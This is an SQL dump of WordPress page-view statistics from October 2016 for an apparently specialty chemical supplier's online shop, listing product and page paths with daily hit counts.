INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-12', 2, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agent/', '2016-10-12', 2, 293); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a4/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1014); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/', '2016-10-12', 1, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1525/', '2016-10-12', 1, 954); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/', '2016-10-12', 1, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/agl-683/', '2016-10-12', 1, 1072); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/agl-683/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1072); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143az/', '2016-10-12', 2, 452); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143az/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 452); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-407/', '2016-10-12', 1, 1111); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coating-mil-spec/', '2016-10-12', 1, 637); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-s/', '2016-10-12', 1, 659); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conductive-coating/', '2016-10-12', 1, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing', '2016-10-12', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing/', '2016-10-12', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-12', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-10-12', 2, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/%20', '2016-10-12', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-462h/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-12', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/', '2016-10-12', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/', '2016-10-12', 1, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-68/', '2016-10-12', 1, 1224); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-68/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1224); 
INSERT INTO `wp_statistics_pages` VALUES ('/?cachebuster=339242463', '2016-10-12', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-12', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3164/', '2016-10-12', 3, 1181); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3164/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1181); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a0/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1002); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3282/', '2016-10-12', 1, 1193); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-su-8/', '2016-10-12', 1, 952); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-su-8/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 952); 
INSERT INTO `wp_statistics_pages` VALUES ('/about', '2016-10-12', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-12', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-12', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-12', 1, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents', '2016-10-12', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support', '2016-10-12', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating', '2016-10-12', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant', '2016-10-12', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease', '2016-10-12', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive', '2016-10-12', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication', '2016-10-12', 1, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants', '2016-10-12', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3295/', '2016-10-12', 2, 1209); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/pfpe-re-move-ms-250252/', '2016-10-12', 1, 1711); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-coating/', '2016-10-12', 1, 734); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-10-12', 1, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-13', 10, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-13', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-13', 512, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-13', 67, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-13', 77, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/', '2016-10-13', 58, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-13', 145, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/', '2016-10-13', 8, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/about', '2016-10-13', 2, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-13', 4, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-13', 22, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=2050', '2016-10-13', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-13', 13, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-13', 86, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-13', 15, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-13', 13, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-13', 13, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-738/', '2016-10-13', 4, 1840); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-738/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 1840); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-13', 34, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-13', 1, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-13', 10, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-13', 2, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-13', 3, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/', '2016-10-13', 7, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/?wc-ajax=get_refreshed_fragments', '2016-10-13', 3, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-13', 16, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-13', 15, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-13', 6, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-13', 7, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gf_page=upload', '2016-10-13', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-13', 6, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-13', 8, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-13', 3, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-13', 3, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-10-13', 2, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-13', 3, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-13', 4, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-13', 3, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/', '2016-10-13', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-13', 2, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/cobra-duster/', '2016-10-13', 1, 1851); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-13', 5, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1525/', '2016-10-13', 2, 954); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1525/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 954); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-xht-takes-heat/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 2375); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-13', 7, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/', '2016-10-13', 1, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8280/', '2016-10-13', 6, 891); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-13', 9, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-13', 4, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/?wc-ajax=get_refreshed_fragments', '2016-10-13', 4, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-13', 8, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/?wc-ajax=get_refreshed_fragments', '2016-10-13', 5, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-58034/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 994); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52/', '2016-10-13', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-13', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-13', 2, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-13', 2, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8280/?wc-ajax=get_refreshed_fragments', '2016-10-13', 3, 891); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-13', 2, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ac/', '2016-10-13', 2, 582); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ac/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 582); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/', '2016-10-13', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-10-13', 8, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-10-13', 4, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-153bn/', '2016-10-13', 1, 308); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/', '2016-10-13', 2, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/composite-mold-release-agent/', '2016-10-13', 2, 290); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-10-13', 1, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-13', 7, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/', '2016-10-13', 2, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/', '2016-10-13', 3, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/', '2016-10-13', 1, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/', '2016-10-13', 2, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-13', 2, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-acx/', '2016-10-13', 1, 674); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-acx/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 674); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/', '2016-10-13', 2, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-13', 7, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-s/', '2016-10-13', 1, 659); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-ac/', '2016-10-13', 1, 672); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-10-13', 2, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381h/', '2016-10-13', 1, 1670); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/', '2016-10-13', 2, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-13', 5, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-coatings/', '2016-10-13', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-13', 6, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-13', 11, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-13', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-10-13', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-10-13', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-10-13', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-13', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-216/', '2016-10-13', 1, 823); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-216/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 823); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-13', 1, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-13', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-13', 2, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-x-si/', '2016-10-13', 1, 2344); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-specialty-solvent/', '2016-10-13', 3, 2618); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-silicone-lubricant/', '2016-10-13', 1, 1819); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/', '2016-10-13', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-specialty-solvent', '2016-10-13', 2, 2618); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/', '2016-10-13', 1, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1031/', '2016-10-13', 1, 948); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1031/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 948); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-460h/', '2016-10-13', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-58005/', '2016-10-13', 2, 977); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-58034/', '2016-10-13', 2, 994); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-813/', '2016-10-13', 1, 903); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-813/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 903); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-10-13', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8132/', '2016-10-13', 2, 912); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-13', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-13', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-13', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-13', 1, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents', '2016-10-13', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support', '2016-10-13', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating', '2016-10-13', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-13', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant', '2016-10-13', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox', '2016-10-13', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease', '2016-10-13', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive', '2016-10-13', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-13', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication', '2016-10-13', 1, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication/', '2016-10-13', 1, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants', '2016-10-13', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-13', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation', '2016-10-13', 1, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases', '2016-10-13', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-13', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq', '2016-10-13', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-13', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding', '2016-10-13', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-13', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants', '2016-10-13', 1, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-13', 1, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life', '2016-10-13', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-13', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness', '2016-10-13', 1, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/', '2016-10-13', 1, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant', '2016-10-13', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-13', 2, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-825/', '2016-10-13', 1, 842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-10-13', 11, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-13', 3, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8900/', '2016-10-13', 1, 868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8900/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3046/', '2016-10-13', 1, 1166); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/', '2016-10-13', 3, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/h0805ab/', '2016-10-13', 1, 1693); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/%20', '2016-10-13', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/%20', '2016-10-13', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3125/', '2016-10-13', 1, 1866); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-210/', '2016-10-13', 1, 402); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/', '2016-10-13', 1, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/', '2016-10-13', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-505/', '2016-10-13', 1, 1270); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-61/', '2016-10-13', 3, 1069); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-71/', '2016-10-13', 1, 1230); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-13', 2, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-13', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/', '2016-10-13', 1, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/', '2016-10-13', 1, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-834/', '2016-10-13', 1, 885); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-fpg-182/', '2016-10-13', 1, 973); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/?wc-ajax=get_refreshed_fragments', '2016-10-13', 1, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/1102/', '2016-10-13', 1, 1102); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-fpg-028/', '2016-10-13', 1, 984); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-14', 388, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-14', 133, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-fpg-182/', '2016-10-14', 1, 973); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-10-14', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-10-14', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-14', 2, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/?cachebuster=2031513178', '2016-10-14', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-14', 69, 116); 
